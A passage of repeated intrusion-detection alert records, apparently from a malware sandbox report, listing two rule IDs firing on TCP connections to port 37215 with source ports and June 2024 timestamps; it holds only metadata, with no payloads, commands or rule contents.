              SID:2829579
              Source Port:59232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.938151
              SID:2835222
              Source Port:41830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942808
              SID:2835222
              Source Port:47970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043269
              SID:2835222
              Source Port:44400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.830832
              SID:2835222
              Source Port:58696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440431
              SID:2835222
              Source Port:33892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246840
              SID:2835222
              Source Port:59286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507638
              SID:2835222
              Source Port:56486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633189
              SID:2829579
              Source Port:40438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298258
              SID:2829579
              Source Port:54088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.164437
              SID:2835222
              Source Port:51908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302815
              SID:2835222
              Source Port:59818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696299
              SID:2835222
              Source Port:51454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.617545
              SID:2835222
              Source Port:45062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.378674
              SID:2829579
              Source Port:60004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612768
              SID:2829579
              Source Port:34430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316903
              SID:2829579
              Source Port:50818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277236
              SID:2829579
              Source Port:35942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130720
              SID:2829579
              Source Port:60914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155811
              SID:2835222
              Source Port:56312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091644
              SID:2829579
              Source Port:42580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191177
              SID:2829579
              Source Port:48460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783681
              SID:2835222
              Source Port:55150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.091193
              SID:2835222
              Source Port:53222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358553
              SID:2835222
              Source Port:38566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041908
              SID:2829579
              Source Port:41270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042478
              SID:2829579
              Source Port:55176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.866241
              SID:2829579
              Source Port:49486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.784431
              SID:2835222
              Source Port:42706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.523844
              SID:2829579
              Source Port:34512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.417726
              SID:2829579
              Source Port:46682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275934
              SID:2835222
              Source Port:59888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.403322
              SID:2835222
              Source Port:59912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.112312
              SID:2829579
              Source Port:37716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610482
              SID:2835222
              Source Port:43400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909065
              SID:2835222
              Source Port:57252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417237
              SID:2829579
              Source Port:49314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.239770
              SID:2829579
              Source Port:57114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092388
              SID:2829579
              Source Port:48634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.784732
              SID:2829579
              Source Port:48864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.210726
              SID:2835222
              Source Port:60114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264258
              SID:2835222
              Source Port:53554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300164
              SID:2835222
              Source Port:45748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.112513
              SID:2835222
              Source Port:57032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196703
              SID:2835222
              Source Port:37644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.400652
              SID:2835222
              Source Port:51422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670616
              SID:2835222
              Source Port:52276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014555
              SID:2835222
              Source Port:35966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075445
              SID:2829579
              Source Port:38888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943014
              SID:2829579
              Source Port:44926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942318
              SID:2829579
              Source Port:37688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729510
              SID:2835222
              Source Port:37520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.931955
              SID:2835222
              Source Port:38748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.135732
              SID:2829579
              Source Port:53442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155169
              SID:2835222
              Source Port:41050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502509
              SID:2835222
              Source Port:58828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174412
              SID:2829579
              Source Port:52060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757465
              SID:2835222
              Source Port:47350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.727230
              SID:2829579
              Source Port:42260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216314
              SID:2835222
              Source Port:47624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155609
              SID:2835222
              Source Port:37400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170094
              SID:2835222
              Source Port:34372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.759059
              SID:2829579
              Source Port:46136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.803432
              SID:2835222
              Source Port:49356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042191
              SID:2835222
              Source Port:60824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.232136
              SID:2829579
              Source Port:41728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279772
              SID:2829579
              Source Port:59982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194574
              SID:2835222
              Source Port:54130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246528
              SID:2835222
              Source Port:45750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836250
              SID:2829579
              Source Port:53234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.319916
              SID:2829579
              Source Port:59616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278892
              SID:2829579
              Source Port:36008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403028
              SID:2829579
              Source Port:56832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077335
              SID:2829579
              Source Port:32944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936507
              SID:2829579
              Source Port:54764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401355
              SID:2835222
              Source Port:56174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408428
              SID:2829579
              Source Port:56888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555987
              SID:2829579
              Source Port:49008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076626
              SID:2835222
              Source Port:39028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356001
              SID:2835222
              Source Port:39754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.996307
              SID:2835222
              Source Port:46942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655462
              SID:2829579
              Source Port:59664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.054972
              SID:2829579
              Source Port:32940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322047
              SID:2835222
              Source Port:36006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060894
              SID:2829579
              Source Port:48764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.609703
              SID:2829579
              Source Port:50152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.129553
              SID:2829579
              Source Port:57022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264994
              SID:2829579
              Source Port:51050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871060
              SID:2835222
              Source Port:50916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.831615
              SID:2829579
              Source Port:42390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356655
              SID:2835222
              Source Port:38966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677156
              SID:2829579
              Source Port:41836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678387
              SID:2829579
              Source Port:36704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.838858
              SID:2829579
              Source Port:32928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726968
              SID:2829579
              Source Port:56438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195645
              SID:2835222
              Source Port:53860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.937863
              SID:2829579
              Source Port:47156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.949848
              SID:2829579
              Source Port:44466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.297133
              SID:2829579
              Source Port:34860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.246902
              SID:2835222
              Source Port:57092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231246
              SID:2835222
              Source Port:35364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729418
              SID:2829579
              Source Port:43842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.908717
              SID:2835222
              Source Port:53534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279099
              SID:2829579
              Source Port:54624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302186
              SID:2829579
              Source Port:57884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868587
              SID:2829579
              Source Port:37880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.501734
              SID:2829579
              Source Port:42334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227514
              SID:2835222
              Source Port:38072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.789390
              SID:2835222
              Source Port:36646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108814
              SID:2835222
              Source Port:54380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402624
              SID:2835222
              Source Port:52422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238034
              SID:2829579
              Source Port:37180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357222
              SID:2829579
              Source Port:34468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028572
              SID:2829579
              Source Port:53566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358509
              SID:2835222
              Source Port:35772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307637
              SID:2829579
              Source Port:42360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404601
              SID:2829579
              Source Port:59628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672148
              SID:2829579
              Source Port:48030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.617374
              SID:2829579
              Source Port:41862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.910373
              SID:2835222
              Source Port:48062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545985
              SID:2829579
              Source Port:58768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486558
              SID:2829579
              Source Port:51642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041008
              SID:2835222
              Source Port:52688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440403
              SID:2835222
              Source Port:37062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.346833
              SID:2829579
              Source Port:58020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697263
              SID:2835222
              Source Port:35868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524502
              SID:2829579
              Source Port:40250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.953920
              SID:2835222
              Source Port:45902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438330
              SID:2829579
              Source Port:40330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192573
              SID:2829579
              Source Port:51948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833215
              SID:2835222
              Source Port:33554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301921
              SID:2829579
              Source Port:35934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078503
              SID:2829579
              Source Port:49336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.267241
              SID:2829579
              Source Port:51752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973376
              SID:2835222
              Source Port:59358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610681
              SID:2829579
              Source Port:47220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487323
              SID:2835222
              Source Port:59076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835282
              SID:2835222
              Source Port:60254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485787
              SID:2835222
              Source Port:41474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.268871
              SID:2835222
              Source Port:48688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194748
              SID:2829579
              Source Port:35204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276017
              SID:2835222
              Source Port:56022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093639
              SID:2829579
              Source Port:60456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131976
              SID:2829579
              Source Port:36076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.974925
              SID:2835222
              Source Port:40760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.214119
              SID:2835222
              Source Port:36772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.379902
              SID:2829579
              Source Port:33120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633892
              SID:2829579
              Source Port:34998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040936
              SID:2835222
              Source Port:40322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174375
              SID:2835222
              Source Port:53702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.226899
              SID:2829579
              Source Port:42510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.267764
              SID:2829579
              Source Port:59234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552896
              SID:2835222
              Source Port:53322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422189
              SID:2835222
              Source Port:43090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.727929
              SID:2829579
              Source Port:38378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131778
              SID:2829579
              Source Port:52306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487381
              SID:2835222
              Source Port:36200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839595
              SID:2829579
              Source Port:42724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456079
              SID:2835222
              Source Port:53020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244950
              SID:2829579
              Source Port:58864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566731
              SID:2835222
              Source Port:33158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707355
              SID:2829579
              Source Port:34982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308582
              SID:2835222
              Source Port:37074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404070
              SID:2829579
              Source Port:50466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154606
              SID:2835222
              Source Port:58054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477174
              SID:2829579
              Source Port:40874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074239
              SID:2829579
              Source Port:41762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347284
              SID:2829579
              Source Port:42304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.299320
              SID:2829579
              Source Port:55596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454694
              SID:2835222
              Source Port:59498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.994208
              SID:2829579
              Source Port:43618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276190
              SID:2835222
              Source Port:39406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508350
              SID:2835222
              Source Port:36552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012689
              SID:2835222
              Source Port:47688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800293
              SID:2829579
              Source Port:50856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.094065
              SID:2829579
              Source Port:57056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552719
              SID:2829579
              Source Port:32790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308625
              SID:2835222
              Source Port:47584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506040
              SID:2829579
              Source Port:38528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752073
              SID:2829579
              Source Port:35130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.635232
              SID:2829579
              Source Port:52876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153353
              SID:2835222
              Source Port:40774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528153
              SID:2829579
              Source Port:46898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078150
              SID:2829579
              Source Port:39214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757354
              SID:2829579
              Source Port:52016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243637
              SID:2835222
              Source Port:42284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936703
              SID:2835222
              Source Port:44406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.037964
              SID:2835222
              Source Port:58824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129716
              SID:2835222
              Source Port:34828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377509
              SID:2835222
              Source Port:43576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631440
              SID:2829579
              Source Port:58544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669156
              SID:2829579
              Source Port:40102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376677
              SID:2829579
              Source Port:55946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.670711
              SID:2829579
              Source Port:54114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991948
              SID:2835222
              Source Port:34938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406980
              SID:2835222
              Source Port:35208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.198903
              SID:2835222
              Source Port:60334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457077
              SID:2835222
              Source Port:41184
              Destination Port:37215
